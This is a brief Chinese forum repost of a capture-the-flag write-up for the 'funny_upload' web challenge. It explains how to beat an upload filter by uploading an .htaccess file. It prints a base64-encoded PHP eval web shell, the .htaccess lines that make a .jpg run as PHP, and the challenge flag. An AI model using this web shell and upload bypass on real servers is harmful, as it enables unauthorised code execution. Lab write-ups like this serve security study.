ToB企服应用市场:ToB评测及商务社交产业平台
标题:
[Dest0g3 520迎新赛]funny_upload
[打印本页]
作者:
tsx81429
时间:
2024-9-16 12:32
标题:
[Dest0g3 520迎新赛]funny_upload
打开靶机抓包发现过滤代码
发现.htaccess能上传后传入图片马
发现内容对 编码为:PD9waHAgQGV2YWwoJF9QT1NUWzFdKTsgPz4=
在.htaccess文件中进行解码 加入下面内容
AddType application/x-httpd-php .jpg
php_value auto_append_file "php://filter/convert.base64-decode/resource=1.jpg"
复制代码
连接蚁剑查找flag
flag{cc9f0654-9bb1-4de8-9c4b-0d9f8af1d60d}
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/)
Powered by Discuz! X3.4
